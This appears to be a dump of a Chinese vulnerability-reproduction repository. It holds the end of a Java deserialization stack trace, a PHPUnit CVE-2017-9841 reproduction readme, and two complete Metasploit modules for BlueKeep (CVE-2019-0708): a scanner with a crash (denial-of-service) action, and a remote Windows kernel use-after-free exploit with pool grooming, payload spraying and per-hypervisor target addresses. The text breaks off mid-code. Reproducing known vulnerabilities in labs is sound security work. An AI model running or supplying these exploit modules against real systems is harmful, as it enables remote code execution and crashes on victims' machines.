java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) 179 | at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) 180 | at java.lang.Thread.run(Thread.java:745) 181 | Caused by: java.lang.ClassNotFoundException: org.codehaus.groovy.runtime.ConvertedClosure (no security manager: RMI class loader disabled) 182 | at sun.rmi.server.LoaderHandler.loadClass(LoaderHandler.java:393) 183 | at sun.rmi.server.LoaderHandler.loadClass(LoaderHandler.java:185) 184 | at java.rmi.server.RMIClassLoader$2.loadClass(RMIClassLoader.java:637) 185 | at java.rmi.server.RMIClassLoader.loadClass(RMIClassLoader.java:264) 186 | at sun.rmi.server.MarshalInputStream.resolveClass(MarshalInputStream.java:214) 187 | at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1612) 188 | at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1517) 189 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1771) 190 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 191 | at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1990) 192 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1915) 193 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 194 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 195 | at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1990) 196 | at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:500) 197 | at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:427) 198 | at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) 199 | at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) 200 | at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) 201 | at java.lang.reflect.Method.invoke(Method.java:606) 202 | at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017) 203 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893) 204 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 205 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 206 | at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370) 207 | at java.util.HashMap.readObject(HashMap.java:1180) 208 | at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) 209 | at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) 210 | at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) 211 | at java.lang.reflect.Method.invoke(Method.java:606) 212 | at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017) 213 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893) 214 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 215 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 216 | at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1990) 217 | at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:500) 218 | at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:427) 219 | at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) 220 | at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) 221 | at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) 222 | at java.lang.reflect.Method.invoke(Method.java:606) 223 | at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017) 224 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893) 225 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 226 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 227 | at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1990) 228 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1915) 229 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 230 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 231 | at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370) 232 | ... 17 more 233 | ``` 234 | 235 | # 0x07 参考链接 236 | https://blog.csdn.net/littlehaes/article/details/104451590 237 | https://gv7.me/articles/2018/CVE-2016-8735/ 238 | https://github.com/frohoff/ysoserial 239 | http://cn.voidcc.com/question/p-zmdzyjue-bbh.html 240 | -------------------------------------------------------------------------------- /2020_11_13_Microsoft SQL Server Reporting Services权限提升漏洞复现(CVE-2020-0618)/readme.md: -------------------------------------------------------------------------------- 1 | 此篇文章之前已投稿到先知社区,此处不再赘述,地址:https://xz.aliyun.com/t/7891 2 | -------------------------------------------------------------------------------- /2020_11_13_PHPUnit远程代码执行漏洞复现(CVE-2017-9841)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_13_PHPUnit远程代码执行漏洞复现(CVE-2017-9841)/0.png -------------------------------------------------------------------------------- /2020_11_13_PHPUnit远程代码执行漏洞复现(CVE-2017-9841)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_13_PHPUnit远程代码执行漏洞复现(CVE-2017-9841)/1.png -------------------------------------------------------------------------------- /2020_11_13_PHPUnit远程代码执行漏洞复现(CVE-2017-9841)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | PHPUnit:一款php下软件测试常用的框架 3 | 4 | # 0x01 复现环境 5 | 使用环境:vulhub中的环境 6 | 复现版本:PHPUnit 5.6.2 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:Ubuntu 18.04.5 LTS 10 | 11 | cd ./vulhub-master/ 12 | cd ./phpunit/ 13 | cd ./CVE-2017-9841/ 14 | docker-compose build 15 | docker-compose up -d 16 | 17 | # 0x03 利用条件 18 | 使用composer安装受影响版本的PHPUnit 19 | 20 | # 0x04 影响版本 21 | 4.8.19 <= PHPUnit <= 4.8.27 22 | 5.0.10 <= PHPUnit <= 5.6.2 23 | 24 | # 0x05 漏洞复现 25 | 攻击环境:kali_x64_en-us 26 | 27 | 访问http://ybdt.best:8080/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 28 | 直接在请求中添加 29 | ``` 30 | 31 | ``` 32 | 如下图 33 | ![image](./0.png) 34 | 结果如下 35 | ![image](./1.png) 36 | 37 | # 0x06 踩坑记录 38 | 坑1: 39 | 在本地搭建环境,网络可能会非常非常慢,建议找一台云服务器 40 | 41 | # 0x07 参考链接 42 | 无 43 | -------------------------------------------------------------------------------- /2020_11_13_iis6.0(cve-2017-7269)最完整的利用,从远程利用,到本地提权,再到常见失败原因/readme.md: -------------------------------------------------------------------------------- 1 | 此篇文章之前已投稿到先知社区,此处不再赘述,地址:https://xz.aliyun.com/t/6485 2 | -------------------------------------------------------------------------------- /2020_11_15_Windows RDP服务远程代码执行漏洞复现(CVE-2019-0708)-BlueKeep/cve_2019_0708_bluekeep.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: https://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | class MetasploitModule < Msf::Auxiliary 7 | include Msf::Exploit::Remote::RDP 8 | include Msf::Auxiliary::Scanner 9 | include Msf::Auxiliary::Report 10 | 11 | def initialize(info = {}) 12 | super(update_info(info, 13 | 'Name' => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check', 14 | 'Description' => %q{ 15 | This module checks a range of hosts for the CVE-2019-0708 vulnerability 16 | by binding the MS_T120 channel outside of its normal slot and sending 17 | non-DoS packets which respond differently on patched and vulnerable hosts. 18 | It can optionally trigger the DoS vulnerability. 19 | }, 20 | 'Author' => 21 | [ 22 | 'National Cyber Security Centre', # Discovery 23 | 'JaGoTu', # Module 24 | 'zerosum0x0', # Module 25 | 'Tom Sellers' # TLS support, packet documenentation, DoS implementation 26 | ], 27 | 'References' => 28 | [ 29 | [ 'CVE', '2019-0708' ], 30 | [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ] 31 | ], 32 | 'DisclosureDate' => '2019-05-14', 33 | 'License' => MSF_LICENSE, 34 | "Actions" => [ 35 | ["Scan", "Description" => "Scan for exploitable targets"], 36 | ["Crash", "Description" => "Trigger denial of service vulnerability"], 37 | ], 38 | "DefaultAction" => "Scan", 39 | 'Notes' => 40 | { 41 | 'Stability' => [ CRASH_SAFE ], 42 | 'AKA' => ['BlueKeep'] 43 | } 44 | )) 45 | end 46 | 47 | def report_goods 48 | report_vuln( 49 | :host => rhost, 50 | :port => rport, 51 | :proto => 'tcp', 52 | :name => self.name, 53 | :info => 'Behavior indicates a missing Microsoft Windows RDP patch for CVE-2019-0708', 54 | :refs => self.references 55 | ) 56 | end 57 | 58 | def run_host(ip) 59 | # Allow the run command to call the check command 60 | 61 | status = check_host(ip) 62 | if status == Exploit::CheckCode::Vulnerable 63 | print_good(status[1].to_s) 64 | elsif status == Exploit::CheckCode::Unsupported # used to display custom msg error 65 | status = Exploit::CheckCode::Safe 66 | print_status("The target service is not running or refused our connection.") 67 | else 68 | print_status(status[1].to_s) 69 | end 70 | 71 | status 72 | end 73 | 74 | def rdp_reachable 75 | rdp_connect 76 | rdp_disconnect 77 | return true 78 | rescue Rex::ConnectionRefused 79 | return false 80 | rescue Rex::ConnectionTimeout 81 | return false 82 | end 83 | 84 | def check_host(_ip) 85 | # The check command will call this method instead of run_host 86 | status = Exploit::CheckCode::Unknown 87 | 88 | begin 89 | begin 90 | rdp_connect 91 | rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError 92 | return Exploit::CheckCode::Unsupported # used to display custom msg error 93 | end 94 | 95 | status = check_rdp_vuln 96 | rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e 97 | bt = e.backtrace.join("\n") 98 | vprint_error("Unexpected error: #{e.message}") 99 | vprint_line(bt) 100 | elog("#{e.message}\n#{bt}") 101 | rescue RdpCommunicationError 102 | vprint_error("Error communicating RDP protocol.") 103 | status = Exploit::CheckCode::Unknown 104 | rescue Errno::ECONNRESET 105 | vprint_error("Connection reset") 106 | rescue => e 107 | bt = e.backtrace.join("\n") 108 | vprint_error("Unexpected error: #{e.message}") 109 | vprint_line(bt) 110 | elog("#{e.message}\n#{bt}") 111 | ensure 112 | rdp_disconnect 113 | end 114 | 115 | status 116 | end 117 | 118 | def check_for_patch 119 | begin 120 | 6.times do 121 | _res = rdp_recv 122 | end 123 | rescue RdpCommunicationError 124 | # we don't care 125 | end 126 | 127 | # The loop below sends Virtual Channel PDUs (2.2.6.1) that vary in length 128 | # The arch governs which of the packets triggers the desired response 129 | # which is an MCS Disconnect Provider Ultimatum or a timeout. 130 | 131 | # Disconnect Provider message of a valid size for each platform 132 | # has proven to be safe to send as part of the vulnerability check. 133 | x86_string = "00000000020000000000000000000000" 134 | x64_string = "0000000000000000020000000000000000000000000000000000000000000000" 135 | 136 | if action.name == 'Crash' 137 | vprint_status("Sending denial of service payloads") 138 | # Length and chars are arbitrary but total length needs to be longer than 139 | # 16 for x86 and 32 for x64. Making the payload too long seems to cause 140 | # the DoS to fail. Note that sometimes the DoS seems to fail. Increasing 141 | # the payload size and sending more of them doesn't seem to improve the 142 | # reliability. It *seems* to happen more often on x64, I haven't seen it 143 | # fail against x86. Repeated attempts will generally trigger the DoS. 144 | x86_string += "FF" * 1 145 | x64_string += "FF" * 2 146 | else 147 | vprint_status("Sending patch check payloads") 148 | end 149 | 150 | chan_flags = RDPConstants::CHAN_FLAG_FIRST | RDPConstants::CHAN_FLAG_LAST 151 | channel_id = [1005].pack('S>') 152 | x86_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x86_string].pack("H*")), channel_id) 153 | 154 | x64_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x64_string].pack("H*")), channel_id) 155 | 156 | 6.times do 157 | rdp_send(x86_packet) 158 | rdp_send(x64_packet) 159 | 160 | # A single pass should be sufficient to cause DoS 161 | if action.name == 'Crash' 162 | sleep(1) 163 | rdp_disconnect 164 | 165 | sleep(5) 166 | if rdp_reachable 167 | print_error("Target doesn't appear to have been crashed. Consider retrying.") 168 | return Exploit::CheckCode::Unknown 169 | else 170 | print_good("Target service appears to have been successfully crashed.") 171 | return Exploit::CheckCode::Vulnerable 172 | end 173 | end 174 | 175 | # Quick check for the Ultimatum PDU 176 | begin 177 | res = rdp_recv(-1, 1) 178 | rescue EOFError 179 | # we don't care 180 | end 181 | return Exploit::CheckCode::Vulnerable if res&.include?(["0300000902f0802180"].pack("H*")) 182 | 183 | # Slow check for Ultimatum PDU. If it doesn't respond in a timely 184 | # manner then the host is likely patched. 185 | begin 186 | 4.times do 187 | res = rdp_recv 188 | # 0x2180 = MCS Disconnect Provider Ultimatum PDU - 2.2.2.3 189 | if res.include?(["0300000902f0802180"].pack("H*")) 190 | return Exploit::CheckCode::Vulnerable 191 | end 192 | end 193 | rescue RdpCommunicationError 194 | # we don't care 195 | end 196 | end 197 | 198 | Exploit::CheckCode::Safe 199 | end 200 | 201 | def check_rdp_vuln 202 | # check if rdp is open 203 | is_rdp, version_info = rdp_fingerprint 204 | unless is_rdp 205 | vprint_status "Could not connect to RDP service." 206 | return Exploit::CheckCode::Unknown 207 | end 208 | rdp_disconnect 209 | rdp_connect 210 | is_rdp, server_selected_proto = rdp_check_protocol 211 | 212 | requires_nla = [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto 213 | product_version = (version_info && version_info[:product_version]) ? version_info[:product_version] : 'N/A' 214 | info = "Detected RDP on #{peer} (Windows version: #{product_version})" 215 | 216 | service_info = "Requires NLA: #{(!version_info[:product_version].nil? && requires_nla) ? 'Yes' : 'No'}" 217 | info << " (#{service_info})" 218 | 219 | print_status(info) 220 | 221 | if requires_nla 222 | vprint_status("Server requires NLA (CredSSP) security which mitigates this vulnerability.") 223 | return Exploit::CheckCode::Safe 224 | end 225 | 226 | chans = [ 227 | ['cliprdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], 228 | ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP], 229 | ['rdpsnd', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP], 230 | ['snddbg', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP], 231 | ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP], 232 | ] 233 | 234 | success = rdp_negotiate_security(chans, server_selected_proto) 235 | return Exploit::CheckCode::Unknown unless success 236 | 237 | rdp_establish_session 238 | 239 | result = check_for_patch 240 | 241 | if result == Exploit::CheckCode::Vulnerable 242 | report_goods 243 | end 244 | 245 | # Can't determine, but at least we know the service is running 246 | result 247 | end 248 | 249 | end 250 | -------------------------------------------------------------------------------- /2020_11_15_Windows RDP服务远程代码执行漏洞复现(CVE-2019-0708)-BlueKeep/cve_2019_0708_bluekeep_rce.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: https://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | # Exploitation and Caveats from zerosum0x0: 7 | # 8 | # 1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally. 9 | # 2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py) 10 | # 3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120. 11 | # 4. RDP has chunked messages, so we use this to groom. 12 | # a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120. 13 | # b. However, on 7+, MS_T120 will not work and you have to use RDPSND. 14 | # i. RDPSND only works when 15 | # HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0 16 | # ii. This registry key is not a default setting for server 2008 R2. SHITTY ISSUE 17 | # 5. Use chunked grooming to fit new data in the freed channel, account for 18 | # the allocation header size (like 0x38 I think?). At offset 0x100? is where 19 | # the "call [rax]" gadget will get its pointer from. 20 | # a. The NonPagedPool (NPP) starts at a fixed address on XP-7 21 | # i. Hot-swap memory is another SHITTY ISSUE. With certain VMWare and 22 | # Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP 23 | # start. This can be anywhere from 100 mb to gigabytes of offset 24 | # before the NPP start. 25 | # b. Set offset 0x100 to NPPStart+SizeOfGroomInMB 26 | # c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need 27 | # [NPPStart+SizeOfGroomInMB+8...payload]... because "call [rax]" is an 28 | # indirect call 29 | # d. We are limited to 0x400 payloads by channel chunk max size. My 30 | # current shellcode is a twin shellcode with eggfinders. I spam the 31 | # kernel payload and user payload, and if user payload is called first it 32 | # will egghunt for the kernel payload. 33 | # 6. After channel hole is filled and the NPP is spammed up with shellcode, 34 | # trigger the free by closing the socket. 35 | # 36 | # TODO: 37 | # * Detect OS specifics / obtain memory leak to determine NPP start address. 38 | # * Write the XP/2003 portions grooming MS_T120. 39 | # * Detect if RDPSND grooming is working or not? 40 | # * Expand channels besides RDPSND/MS_T120 for grooming. 41 | # See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/ 42 | # 43 | # https://github.com/0xeb-bp/bluekeep .. this repo has code for grooming 44 | # MS_T120 on XP... should be same process as the RDPSND 45 | 46 | class MetasploitModule < Msf::Exploit::Remote 47 | 48 | Rank = ManualRanking 49 | 50 | USERMODE_EGG = 0xb00dac0fefe31337 51 | KERNELMODE_EGG = 0xb00dac0fefe42069 52 | 53 | CHUNK_SIZE = 0x400 54 | HEADER_SIZE = 0x48 55 | 56 | include Msf::Exploit::Remote::RDP 57 | include Msf::Exploit::Remote::CheckScanner 58 | 59 | def initialize(info = {}) 60 | super(update_info(info, 61 | 'Name' => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free', 62 | 'Description' => %q( 63 | The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, 64 | allowing a malformed Disconnect Provider Indication message to cause use-after-free. 65 | With a controllable data/size remote nonpaged pool spray, an indirect call gadget of 66 | the freed channel is used to achieve arbitrary code execution. 67 | ), 68 | 'Author' => 69 | [ 70 | 'Sean Dillon ', # @zerosum0x0 - Original exploit 71 | 'Ryan Hanson ', # @ryHanson - Original exploit 72 | 'OJ Reeves ', # @TheColonial - Metasploit module 73 | 'Brent Cook ', # @busterbcook - Assembly whisperer 74 | ], 75 | 'License' => MSF_LICENSE, 76 | 'References' => 77 | [ 78 | ['CVE', '2019-0708'], 79 | ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'], 80 | ], 81 | 'DefaultOptions' => 82 | { 83 | 'EXITFUNC' => 'thread', 84 | 'WfsDelay' => 5, 85 | 'RDP_CLIENT_NAME' => 'ethdev', 86 | 'CheckScanner' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep' 87 | }, 88 | 'Privileged' => true, 89 | 'Payload' => 90 | { 91 | 'Space' => CHUNK_SIZE - HEADER_SIZE, 92 | 'EncoderType' => Msf::Encoder::Type::Raw, 93 | }, 94 | 'Platform' => 'win', 95 | 'Targets' => 96 | [ 97 | [ 98 | 'Automatic targeting via fingerprinting', 99 | { 100 | 'Arch' => [ARCH_X64], 101 | 'FingerprintOnly' => true 102 | }, 103 | ], 104 | # 105 | # 106 | # Windows 2008 R2 requires the following registry change from default: 107 | # 108 | # [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd] 109 | # "fDisableCam"=dword:00000000 110 | # 111 | [ 112 | 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)', 113 | { 114 | 'Platform' => 'win', 115 | 'Arch' => [ARCH_X64], 116 | 'GROOMBASE' => 0xfffffa8003800000 117 | } 118 | ], 119 | [ 120 | # This works with Virtualbox 6 121 | 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)', 122 | { 123 | 'Platform' => 'win', 124 | 'Arch' => [ARCH_X64], 125 | 'GROOMBASE' => 0xfffffa8002407000 126 | } 127 | ], 128 | [ 129 | # This address works on VMWare 15 on Windows. 130 | 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)', 131 | { 132 | 'Platform' => 'win', 133 | 'Arch' => [ARCH_X64], 134 | 'GROOMBASE' => 0xfffffa8018C00000 135 | #'GROOMBASE' => 0xfffffa801C000000 136 | } 137 | ], 138 | [ 139 | 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)', 140 | { 141 | 'Platform' => 'win', 142 | 'Arch' => [ARCH_X64], 143 | 'GROOMBASE' => 0xfffffa8102407000 144 | } 145 | ], 146 | ], 147 | 'DefaultTarget' => 0, 148 | 'DisclosureDate' => 'May 14 2019', 149 | 'Notes' => 150 | { 151 | 'AKA' => ['Bluekeep'] 152 | } 153 | )) 154 | 155 | register_advanced_options( 156 | [ 157 | OptBool.new('ForceExploit', [false, 'Override check result', false]), 158 | OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]), 159 | OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]), 160 | OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]), 161 | ] 162 | ) 163 | end 164 | 165 | def exploit 166 | unless check == CheckCode::Vulnerable || datastore['ForceExploit'] 167 | fail_with(Failure::NotVulnerable, 'Set ForceExploit to override') 168 | end 169 | 170 | if target['FingerprintOnly'] 171 | fail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually') 172 | end 173 | 174 | begin 175 | rdp_connect 176 | rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError 177 | fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service') 178 | end 179 | 180 | is_rdp, server_selected_proto = rdp_check_protocol 181 | unless is_rdp 182 | fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service') 183 | end 184 | 185 | # We don't currently support NLA in the mixin or the exploit. However, if we have valid creds, NLA shouldn't stop us 186 | # from exploiting the target. 187 | if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto) 188 | fail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.') 189 | end 190 | 191 | chans = [ 192 | ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP], 193 | [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP], 194 | [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP], 195 | ['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], 196 | ['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], 197 | ['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], 198 | ['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], 199 | ['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], 200 | ['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], 201 | ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], 202 | ] 203 | 204 | @mst120_chan_id = 1004 + chans.length - 1 205 | 206 | unless rdp_negotiate_security(chans, server_selected_proto) 207 | fail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.') 208 | end 209 | 210 | rdp_establish_session 211 | 212 | rdp_dispatch_loop 213 | end 214 | 215 | private 216 | 217 | # This function is invoked when the PAKID_CORE_CLIENTID_CONFIRM message is 218 | # received on a channel, and this is when we need to kick off our exploit. 219 | def rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data) 220 | # We have to do the default behaviour first. 221 | super(pkt, user, chan_id, flags, data) 222 | 223 | groom_size = datastore['GROOMSIZE'] 224 | pool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size) 225 | groom_chan_count = datastore['GROOMCHANNELCOUNT'] 226 | 227 | payloads = create_payloads(pool_addr) 228 | 229 | print_status("Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.") 230 | 231 | target_channel_id = chan_id + 1 232 | 233 | spray_buffer = create_exploit_channel_buffer(pool_addr) 234 | spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF) 235 | free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80 236 | 237 | print_status("Surfing channels ...") 238 | rdp_send(spray_channel * 1024) 239 | rdp_send(free_trigger) 240 | 241 | chan_surf_size = 0x421 242 | spray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min 243 | chan_surf_packet = spray_channel * spray_packets 244 | chan_surf_count = chan_surf_size / spray_packets 245 | 246 | chan_surf_count.times do 247 | rdp_send(chan_surf_packet) 248 | end 249 | 250 | print_status("Lobbing eggs ...") 251 | 252 | groom_mb = groom_size * 1024 / payloads.length 253 | 254 | groom_mb.times do 255 | tpkts = '' 256 | for c in 0..groom_chan_count 257 | payloads.each do |p| 258 | tpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF) 259 | end 260 | end 261 | rdp_send(tpkts) 262 | end 263 | 264 | # Terminating and disconnecting forces the USE 265 | print_status("Forcing the USE of FREE'd object ...") 266 | rdp_terminate 267 | rdp_disconnect 268 | end 269 | 270 | # Helper function to create the kernel mode payload and the usermode payload with 271 | # the egg hunter prefix. 272 | def create_payloads(pool_address) 273 | begin 274 | [kernel_mode_payload, user_mode_payload].map { |p| 275 | [ 276 | pool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg 277 | p 278 | ].pack(' ex 281 | print_error("#{ex.backtrace.join("\n")}: #{ex.message} (#{ex.class})") 282 | end 283 | end 284 | 285 | def assemble_with_fixups(asm) 286 | # Rewrite all instructions of form 'lea reg, [rel label]' as relative 287 | # offsets for the instruction pointer, since metasm's 'ModRM' parser does 288 | # not grok that syntax. 289 | lea_rel = /lea+\s(?\w{2,3}),*\s\[rel+\s(?